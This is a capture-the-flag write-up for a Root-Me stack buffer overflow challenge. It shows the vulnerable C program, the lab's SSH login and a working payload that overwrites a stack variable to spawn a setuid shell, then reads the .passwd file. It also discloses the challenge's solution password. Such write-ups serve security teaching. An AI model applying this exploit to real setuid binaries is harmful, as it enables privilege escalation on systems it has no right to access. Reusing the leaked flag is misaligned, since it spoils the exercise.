* ELF x86 - Stack buffer overflow basic 1
Aufgabe
Einstellungen der Umgebung
PIE 	Position Independent Executable 	 pas_valide.svg?1566650180
RelRO 	Read Only relocations 	 pas_valide.svg?1566650180
NX 	Non-Executable Stack 	 pas_valide.svg?1566650180
Heap exec 	Non-Executable Heap 	 pas_valide.svg?1566650180
ASLR 	Address Space Layout Randomization 	 pas_valide.svg?1566650180
SF 	Source Fortification 	 pas_valide.svg?1566650180
SRC 	Zugriff auf den Source code 	 valide.svg?1566650190
Quellcode
#+begin_src C
    #include <unistd.h>
    #include <sys/types.h>
    #include <stdlib.h>
    #include <stdio.h>

    int main()
    {

      int var;
      int check = 0x04030201;
      char buf[40];

      fgets(buf,45,stdin);

      printf("\n[buf]: %s\n", buf);
      printf("[check] %p\n", check);

      if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf ("\nYou are on the right way!\n");

      if (check == 0xdeadbeef)
       {
         printf("Hell yeah! You win!\nOpening your shell...\n");
         setreuid(geteuid(), geteuid());
         system("/bin/bash");
         printf("Shell closed! Bye.\n");
       }
       return 0;
    }
#+end_src

#+begin_quote
Zugangsdaten für die Übung
Host	challenge02.root-me.org
Protokoll	SSH
Port	2222
Zugang per SSH 	ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
Benutzername	app-systeme-ch13
Passwort	app-systeme-ch13
#+end_quote

#+begin_src sh
python3 -c "import sys; sys.stdout.buffer.write(b'A'*(40) + b'\xef\xbe\xad\xde')" | ./ch13
#+end_src

** Findings (live target)

- Remote path: =/challenge/app-systeme/ch13=
- Binary: =ch13: setuid ELF 32-bit, dynamically linked, not stripped=
- Effective mitigations from runtime check:
  - Partial RELRO
  - No stack canary
  - NX enabled
  - No PIE
  - ASLR OFF (on target host)
- Vulnerability: =fgets(buf,45,stdin)= writes up to 44 bytes into =char buf[40]=, overflowing 4 bytes into adjacent =check=.
- Target value: overwrite =check= from =0x04030201= to =0xdeadbeef= (little-endian bytes =\xef\xbe\xad\xde=).

** Working exploitation flow

- Basic trigger (proves control of =check=):

#+begin_src sh
python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13
#+end_src

- To keep stdin open for the spawned SUID shell, use a pipeline with =cat=:

#+begin_src sh
(python3 -c "import sys; sys.stdout.buffer.write(b'A'*40+b'\xef\xbe\xad\xde')"; cat) | ./ch13
id
cat .passwd
exit
#+end_src

- Observed privilege in spawned shell:
  - =uid=1213(app-systeme-ch13-cracked)=
  - =gid=1113(app-systeme-ch13)=
- Retrieved validation password:
  - =1w4ntm0r3pr0np1s=

** Helper scripts

- =helper_recon.py=: SSH recon script (pwd, ls, file, checksec, smoke run).
- =helper_exploit_password.py=: SSH interactive exploit script that keeps stdin open and reads =.passwd=.